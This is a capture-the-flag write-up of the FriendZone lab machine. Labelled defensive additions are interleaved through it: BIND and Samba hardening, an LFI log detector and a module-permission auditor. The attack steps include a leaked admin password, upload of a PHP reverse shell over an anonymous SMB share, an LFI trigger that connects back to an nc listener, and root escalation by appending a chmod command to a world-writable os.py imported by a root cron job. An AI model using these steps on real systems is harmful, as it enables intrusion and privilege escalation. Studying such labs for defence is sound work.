friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1
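The host -l output above is a full zone transfer (AXFR) that the target's BIND server handed to an unauthenticated client; that is what exposed the internal subdomains. As an added example, not the write-up's or the machine's own configuration, here is a named.conf zone stanza of the permissive kind beside a hardened one. Older BIND releases allow transfers from any host unless allow-transfer is set. The zone file path, key name, secret and the secondary's address are placeholders.

```conf
// Permissive (assumed layout): no allow-transfer, so any client that can
// reach port 53 may pull the whole zone, as host -l did above.
zone "friendzone.red" {
    type master;
    file "/etc/bind/db.friendzone.red";
};

// Hardened: transfers only to a TSIG-authenticated secondary.
key "xfer-key" {
    algorithm hmac-sha256;
    secret "PLACEHOLDER-BASE64-SECRET";   // generate with tsig-keygen
};

zone "friendzone.red" {
    type master;
    file "/etc/bind/db.friendzone.red";
    allow-transfer { key "xfer-key"; };    // placeholder key; or a specific secondary IP
    also-notify { 192.0.2.53; };           // placeholder secondary (RFC 5737 address)
};
```

Setting allow-transfer { none; }; in the options block makes the restriction the default for every zone, so a forgotten stanza fails closed rather than open. Internal names that must not be visible from the outside belong in a separate view or zone served only to internal resolvers.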

Let's look at each one

Add the discovered subdomains to /etc/hosts as well.

(hr.friendzone.red returned Not Found)

uploads.friendzone.red

(screenshot of uploads.friendzone.red)

administrator1.friendzone.red

(screenshot of the administrator1.friendzone.red login page)

Logging in with the admin:WORKWORKHhallelujah@# credentials from earlier succeeds.

gobuster

kali@kali:~$ gobuster dir -u  https://administrator1.friendzone.red/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt  -k -t 40 -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://administrator1.friendzone.red/
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt
[+] Timeout:        10s
===============================================================
2020/06/21 19:32:45 Starting gobuster
===============================================================
/login.php (Status: 200)
/images (Status: 301)
/dashboard.php (Status: 200)
/timestamp.php (Status: 200)

(screenshot)

Let's access /dashboard.php.

(screenshot of /dashboard.php)

Let's try the default params.

(screenshot)

An irritating image appeared.

The timestamp looks like it refers to the timestamp.php that gobuster found, so maybe LFI can be used?

Finding an upload location for the LFI

The first candidate was uploads.friendzone.red, but I couldn't figure out where files were being uploaded.
While puzzling over it, I realized there's no need to use uploads.friendzone.red at all; transferring over smb works just as well.

Transfer over smb

Upload the following over smb:
https://github.com/pentestmonkey/php-reverse-shell

kali@kali:~$ smbclient //10.10.10.123/Development
Enter WORKGROUP\kali's password:                                                                                                                                                                                                           
Try "help" to get a list of possible commands.                                                                                                                                                                                             
smb: \> put php-reverse-shell.php                                                                                                                                                                                                          
putting file php-reverse-shell.php as \php-reverse-shell.php (6.9 kb/s) (average 6.9 kb/s)                                                                                                                                                 
smb: \> ls                                                                                                                                                                                                                                 
  .                                   D        0  Sun Jun 21 20:02:08 2020
  ..                                  D        0  Wed Jan 23 16:51:02 2019
  php-reverse-shell.php               A     5493  Sun Jun 21 20:04:58 2020

                9221460 blocks of size 1024. 6373116 blocks available
smb: \> exit
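Both share interactions above, the anonymous read of creds.txt from general and the anonymous write into Development, come down to share definitions that allow guest access, with Development additionally writable and rooted under /etc, where the web application could later include from it. The smb.conf fragment below is an added example rather than the target's actual configuration: it shows share definitions of that weak kind beside a hardened version. The /etc/general path, the group names and the /srv/samba paths are assumptions, and a real file can hold only one definition per share name; the two sets are shown together only for comparison.

```conf
; --- Weak (assumed to resemble the target; its smb.conf is not shown) ---
[global]
   workgroup = WORKGROUP
   map to guest = Bad User        ; unknown users become guest instead of being refused

[general]
   path = /etc/general            ; assumed path
   guest ok = yes                 ; anonymous read of creds.txt
   read only = yes

[Development]
   path = /etc/Development        ; reachable by the PHP include above
   guest ok = yes
   writable = yes                 ; anonymous upload of php-reverse-shell.php
   create mask = 0777

; --- Hardened ---
[global]
   workgroup = WORKGROUP
   map to guest = Never           ; no guest fallback
   restrict anonymous = 2

[general]
   path = /srv/samba/general      ; share root outside anything the web tier can include
   guest ok = no
   valid users = @staff           ; placeholder group
   read only = yes

[Development]
   path = /srv/samba/development
   guest ok = no
   valid users = @developers      ; placeholder group
   writable = yes
   create mask = 0660             ; uploads are never executable
   directory mask = 0770
```

After editing, testparm validates the file and smbclient -N -L //host shows what an anonymous client can still enumerate; the hardened version should list no user shares at all. Keeping secrets such as creds.txt off file shares entirely is the real fix for the first half of this chain.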

Now, accessing the following…

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell

gives us a shell.

kali@kali:~$ nc -lnvp 1212
listening on [any] 1212 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.123] 58082
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 03:05:57 up  5:44,  0 users,  load average: 1.03, 0.65, 0.38
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'          
www-data@FriendZone:/$ 
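The shell came from dashboard.php including whatever pagename pointed at. Two defender-side measures follow from that: resolve pagename against an allowlist instead of building an include path from it, and watch the access log for pagename values that are paths rather than page names. The Python below is an added example, not code from the write-up or the FriendZone application; the allowlist contents, the base directory /var/www/admin and the log lines are constructed.

```python
"""Detect include-parameter abuse in web access logs and show the safe resolution.
Added example with constructed data; not from the write-up or the target application."""
import re
from urllib.parse import urlsplit, parse_qs

# Assumed allowlist: the dashboard only ever legitimately includes timestamp.php.
ALLOWED_PAGES = {"timestamp"}

# Constructed Apache combined-log lines (not a real capture from the machine).
SAMPLE_LOG = """\
10.10.14.25 - - [22/Jun/2020:03:00:01 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 512
10.10.14.25 - - [22/Jun/2020:03:04:12 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell HTTP/1.1" 200 1024
10.10.14.25 - - [22/Jun/2020:03:04:30 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=../../../../etc/passwd HTTP/1.1" 200 2048
10.10.14.25 - - [22/Jun/2020:03:05:10 +0000] "GET /login.php HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def classify_pagename(value):
    """Return None for an allowlisted bare page name, otherwise why the value is suspicious."""
    if ".." in value:
        return "traversal"
    if "/" in value or "\\" in value:
        return "absolute or nested path"
    if value not in ALLOWED_PAGES:
        return "not in allowlist"
    return None


def find_lfi_attempts(log_text):
    """Return (ip, timestamp, pagename, reason) for every request whose pagename is suspicious."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or unrelated line
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query).get("pagename", []):
            reason = classify_pagename(value)
            if reason:
                hits.append((m.group("ip"), m.group("ts"), value, reason))
    return hits


def safe_include_target(pagename, base_dir="/var/www/admin"):
    """Hardened counterpart of include($_GET['pagename'] . '.php'): only allowlisted names resolve.
    base_dir is an assumed location, not the target's real document root."""
    if classify_pagename(pagename) is not None:
        raise ValueError("pagename rejected: %r" % pagename)
    return "%s/%s.php" % (base_dir, pagename)


if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print("%s %s pagename=%s (%s)" % hit)
```

The classifier treats anything that is not a plain allowlisted name as suspicious, which is the same rule the hardened include applies, so the detection and the fix share one definition of "valid" and cannot drift apart. On this target the second log line (the URL from the write-up) is the one that would have paged someone.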

pspy

www-data@FriendZone:/$ ./tmp/pspy64 -i 1000 
./tmp/pspy64 -i 1000 
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 1s and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/22 03:28:57 CMD: UID=0    PID=98     | 
2020/06/22 03:28:57 CMD: UID=0    PID=9      | 
2020/06/22 03:28:57 CMD: UID=0    PID=89     | 
2020/06/22 03:28:57 CMD: UID=107  PID=861    | /usr/sbin/exim4 -bd -q30m 
2020/06/22 03:28:57 CMD: UID=0    PID=854    | /usr/sbin/smbd --foreground --no-process-group 
2020/06/22 03:28:57 CMD: UID=0    PID=852    | /usr/sbin/smbd --foreground --no-process-group 
2020/06/22 03:28:57 CMD: UID=0    PID=851    | /usr/sbin/smbd --foreground --no-process-group 
2020/06/22 03:28:57 CMD: UID=0    PID=85     | 
2020/06/22 03:28:57 CMD: UID=0    PID=82     | 
2020/06/22 03:28:57 CMD: UID=0    PID=81     | 
2020/06/22 03:28:57 CMD: UID=0    PID=80     | 
2020/06/22 03:28:57 CMD: UID=0    PID=8      | 
2020/06/22 03:28:57 CMD: UID=0    PID=79     | 
2020/06/22 03:28:57 CMD: UID=0    PID=78     | 
2020/06/22 03:28:57 CMD: UID=0    PID=77     | 
2020/06/22 03:28:57 CMD: UID=0    PID=726    | /usr/sbin/smbd --foreground --no-process-group 
2020/06/22 03:28:57 CMD: UID=0    PID=7      | 
2020/06/22 03:28:57 CMD: UID=0    PID=6      | 
2020/06/22 03:28:57 CMD: UID=33   PID=5740   | ./tmp/pspy64 -i 1000 
2020/06/22 03:28:57 CMD: UID=33   PID=5737   | /bin/bash 
2020/06/22 03:28:57 CMD: UID=33   PID=5736   | python3 -c import pty; pty.spawn("/bin/bash") 
2020/06/22 03:28:57 CMD: UID=33   PID=5735   | /bin/sh -i 
2020/06/22 03:28:57 CMD: UID=0    PID=5733   | 
2020/06/22 03:28:57 CMD: UID=0    PID=5732   | 
2020/06/22 03:28:57 CMD: UID=33   PID=5729   | sh -c uname -a; w; id; /bin/sh -i 
2020/06/22 03:28:57 CMD: UID=0    PID=572    | /usr/sbin/nmbd --foreground --no-process-group 
2020/06/22 03:28:57 CMD: UID=0    PID=566    | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=0    PID=5647   | 
2020/06/22 03:28:57 CMD: UID=0    PID=564    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2020/06/22 03:28:57 CMD: UID=0    PID=5639   | 
2020/06/22 03:28:57 CMD: UID=0    PID=562    | /usr/sbin/sshd -D 
2020/06/22 03:28:57 CMD: UID=33   PID=5531   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=0    PID=550    | /usr/sbin/vsftpd /etc/vsftpd.conf 
2020/06/22 03:28:57 CMD: UID=33   PID=5497   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5484   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5481   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=0    PID=5473   | 
2020/06/22 03:28:57 CMD: UID=33   PID=5464   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5416   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5415   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=109  PID=541    | /usr/sbin/named -f -4 -u bind 
2020/06/22 03:28:57 CMD: UID=33   PID=5383   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5364   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5351   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=33   PID=5320   | /usr/sbin/apache2 -k start 
2020/06/22 03:28:57 CMD: UID=0    PID=4      | 
2020/06/22 03:28:57 CMD: UID=0    PID=391    | /usr/lib/accountsservice/accounts-daemon 
2020/06/22 03:28:57 CMD: UID=0    PID=390    | /usr/sbin/cron -f 
2020/06/22 03:28:57 CMD: UID=102  PID=382    | /usr/sbin/rsyslogd -n 
2020/06/22 03:28:57 CMD: UID=0    PID=381    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers 
2020/06/22 03:28:57 CMD: UID=0    PID=379    | /lib/systemd/systemd-logind 
2020/06/22 03:28:57 CMD: UID=0    PID=378    | /usr/bin/VGAuthService 
2020/06/22 03:28:57 CMD: UID=103  PID=377    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2020/06/22 03:28:57 CMD: UID=0    PID=35     | 
2020/06/22 03:28:57 CMD: UID=0    PID=34     | 
2020/06/22 03:28:57 CMD: UID=0    PID=32     | 
2020/06/22 03:28:57 CMD: UID=62583 PID=314    | /lib/systemd/systemd-timesyncd 
2020/06/22 03:28:57 CMD: UID=101  PID=313    | /lib/systemd/systemd-resolved 
2020/06/22 03:28:57 CMD: UID=0    PID=30     | 
2020/06/22 03:28:57 CMD: UID=0    PID=29     | 
2020/06/22 03:28:57 CMD: UID=0    PID=28     | 
2020/06/22 03:28:57 CMD: UID=0    PID=27     | 
2020/06/22 03:28:57 CMD: UID=0    PID=26     | 
2020/06/22 03:28:57 CMD: UID=100  PID=254    | /lib/systemd/systemd-networkd 
2020/06/22 03:28:57 CMD: UID=0    PID=252    | /lib/systemd/systemd-udevd 
2020/06/22 03:28:57 CMD: UID=0    PID=25     | 
2020/06/22 03:28:57 CMD: UID=0    PID=24     | 
2020/06/22 03:28:57 CMD: UID=0    PID=233    | /lib/systemd/systemd-journald 
2020/06/22 03:28:57 CMD: UID=0    PID=230    | /usr/bin/vmtoolsd 
2020/06/22 03:28:57 CMD: UID=0    PID=23     | 
2020/06/22 03:28:57 CMD: UID=0    PID=22     | 
2020/06/22 03:28:57 CMD: UID=0    PID=21     | 
2020/06/22 03:28:57 CMD: UID=0    PID=20     | 
2020/06/22 03:28:57 CMD: UID=0    PID=2      | 
2020/06/22 03:28:57 CMD: UID=0    PID=195    | 
2020/06/22 03:28:57 CMD: UID=0    PID=194    | 
2020/06/22 03:28:57 CMD: UID=0    PID=19     | 
2020/06/22 03:28:57 CMD: UID=0    PID=18     | 
2020/06/22 03:28:57 CMD: UID=0    PID=173    | 
2020/06/22 03:28:57 CMD: UID=0    PID=172    | 
2020/06/22 03:28:57 CMD: UID=0    PID=171    | 
2020/06/22 03:28:57 CMD: UID=0    PID=17     | 
2020/06/22 03:28:57 CMD: UID=0    PID=169    | 
2020/06/22 03:28:57 CMD: UID=0    PID=168    | 
2020/06/22 03:28:57 CMD: UID=0    PID=167    | 
2020/06/22 03:28:57 CMD: UID=0    PID=16     | 
2020/06/22 03:28:57 CMD: UID=0    PID=15     | 
2020/06/22 03:28:57 CMD: UID=0    PID=14     | 
2020/06/22 03:28:57 CMD: UID=0    PID=13     | 
2020/06/22 03:28:57 CMD: UID=0    PID=12     | 
2020/06/22 03:28:57 CMD: UID=0    PID=115    | 
2020/06/22 03:28:57 CMD: UID=0    PID=11     | 
2020/06/22 03:28:57 CMD: UID=0    PID=10     | 
2020/06/22 03:28:57 CMD: UID=0    PID=1      | /sbin/init splash 
2020/06/22 03:30:01 CMD: UID=0    PID=5750   | /bin/sh -c /opt/server_admin/reporter.py 
2020/06/22 03:30:01 CMD: UID=0    PID=5749   | /bin/sh -c /opt/server_admin/reporter.py 
2020/06/22 03:30:01 CMD: UID=0    PID=5748   | /usr/sbin/CRON -f 

Let's look at /opt/server_admin/reporter.py, which cron runs via /bin/sh -c.

www-data@FriendZone:/$ cat /opt/server_admin/reporter.py
cat /opt/server_admin/reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
www-data@FriendZone:/$ ls -la /opt/server_admin/reporter.py
ls -la /opt/server_admin/reporter.py
-rwxr--r-- 1 root root 424 Jan 16  2019 /opt/server_admin/reporter.py

It doesn't look like it can be rewritten. While staring at it...

www-data@FriendZone:/$ ls -la /usr/lib/python2.7/os.py
ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15  2019 /usr/lib/python2.7/os.py

The os.py that it imports is writable.

Wondering whether merely being imported is enough for the code to take effect,

www-data@FriendZone:/$  echo "system('chmod 777 /root')" >> /usr/lib/python2.7/os.py    
<'chmod 777 /root')" >> /usr/lib/python2.7/os.py 

This appended a line that changes the permissions on /root.

www-data@FriendZone:/$ ls -la
ls -la
total 434908
drwxr-xr-x  22 root root      4096 Oct  5  2018 .
drwxr-xr-x  22 root root      4096 Oct  5  2018 ..
drwxr-xr-x   2 root root      4096 Oct  5  2018 bin
drwxr-xr-x   3 root root      4096 Oct  5  2018 boot
drwxr-xr-x  18 root root      3880 Jun 21 21:21 dev
drwxr-xr-x  90 root root      4096 Jan 23  2019 etc
drwxr-xr-x   3 root root      4096 Oct  5  2018 home
lrwxrwxrwx   1 root root        33 Oct  5  2018 initrd.img -> boot/initrd.img-4.15.0-36-generic
lrwxrwxrwx   1 root root        33 Oct  5  2018 initrd.img.old -> boot/initrd.img-4.15.0-36-generic
drwxr-xr-x  18 root root      4096 Jan 23  2019 lib
drwxr-xr-x   2 root root      4096 Oct  5  2018 lib64
drwx------   2 root root     16384 Oct  5  2018 lost+found
drwxr-xr-x   2 root root      4096 Oct  5  2018 media
drwxr-xr-x   2 root root      4096 Oct  5  2018 mnt
drwxr-xr-x   3 root root      4096 Oct  6  2018 opt
dr-xr-xr-x 102 root root         0 Jun 21 21:21 proc
drwxrwxrwx   6 root root      4096 Jan 24  2019 root
drwxr-xr-x  24 root root       640 Jun 21 21:21 run
drwxr-xr-x   2 root root      4096 Jan 23  2019 sbin
drwxr-xr-x   3 root root      4096 Oct  5  2018 srv
-rw-------   1 root root 445255680 Oct  5  2018 swapfile
dr-xr-xr-x  13 root root         0 Jun 22 03:34 sys
drwxrwxrwt   2 root root      4096 Jun 22 03:13 tmp
drwxr-xr-x  10 root root      4096 Oct  5  2018 usr
drwxr-xr-x  12 root root      4096 Oct  6  2018 var
lrwxrwxrwx   1 root root        30 Oct  5  2018 vmlinuz -> boot/vmlinuz-4.15.0-36-generic
lrwxrwxrwx   1 root root        30 Oct  5  2018 vmlinuz.old -> boot/vmlinuz-4.15.0-36-generic
www-data@FriendZone:/$ cd root
cd root
www-data@FriendZone:/root$ cat root.txt

After waiting a while, /root became accessible.
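The escalation worked because a root cron job imported os from a world-writable /usr/lib/python2.7/os.py, so reporter.py itself never had to be touched. The audit that catches that condition before an attacker does is to walk the module search path of every interpreter that privileged jobs use and flag any module file or directory that group or others can write. The script below is an added example, not part of the write-up; demo() builds a constructed directory tree with a 0777 os.py to show the check firing, and audit_interpreter() runs the same check against the interpreter it is executed with.

```python
"""Audit Python module search paths for files a non-root user could modify.
Added example (not from the write-up); reproduces the condition behind the
privilege escalation above: a root cron job importing a world-writable os.py."""
import os
import stat
import sys
import tempfile


def writable_by_others(path):
    """True if the group or world write bit is set on path (mode bits only, no ACL check)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_writable_modules(search_paths):
    """Return a sorted list of module files or directories under search_paths that group/others may write."""
    found = []
    for base in search_paths:
        if not os.path.isdir(base):
            continue
        for dirpath, _dirnames, filenames in os.walk(base):
            # A writable directory is as bad as a writable module: a shadowing
            # module can be dropped there, so report it with a trailing separator.
            if writable_by_others(dirpath):
                found.append(dirpath + os.sep)
            for name in filenames:
                if name.endswith((".py", ".pyc", ".so")):
                    full = os.path.join(dirpath, name)
                    if writable_by_others(full):
                        found.append(full)
    return sorted(found)


def audit_interpreter():
    """Audit the running interpreter's sys.path, i.e. what a cron job using this python imports from."""
    return find_writable_modules([p for p in sys.path if p])


def demo():
    """Run the check on a constructed tree: one 0777 os.py beside a correctly 0644 module.
    Returns paths relative to the temporary root so the result is stable."""
    root = tempfile.mkdtemp(prefix="modaudit-")
    lib = os.path.join(root, "python2.7")
    os.makedirs(lib, mode=0o755)
    bad = os.path.join(lib, "os.py")
    good = os.path.join(lib, "string.py")
    for p in (bad, good):
        with open(p, "w") as fh:
            fh.write("# placeholder module (constructed)\n")
    os.chmod(bad, 0o777)   # the -rwxrwxrwx seen on the target
    os.chmod(good, 0o644)  # what a packaged module should look like
    return [os.path.relpath(p, root) for p in find_writable_modules([lib])]


if __name__ == "__main__":
    print("constructed tree:", demo())
    print("this interpreter:", audit_interpreter() or "nothing group/world-writable")
```

The same walk should cover /usr/lib/python3*, site-packages and any directory named in PYTHONPATH by a cron or systemd unit, since a privileged job inherits whatever search path its environment gives it. Package managers on Debian-based systems install modules as 0644 root-owned, so any hit from this check is either a manual change, as on this machine, or a sign someone has already been there.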

Closing thoughts

It was a really good machine: you have to do all kinds of enumeration, and many different possibilities have to be considered.

WRITTEN BY
さんぽし
Web Developer /w Elixir, Go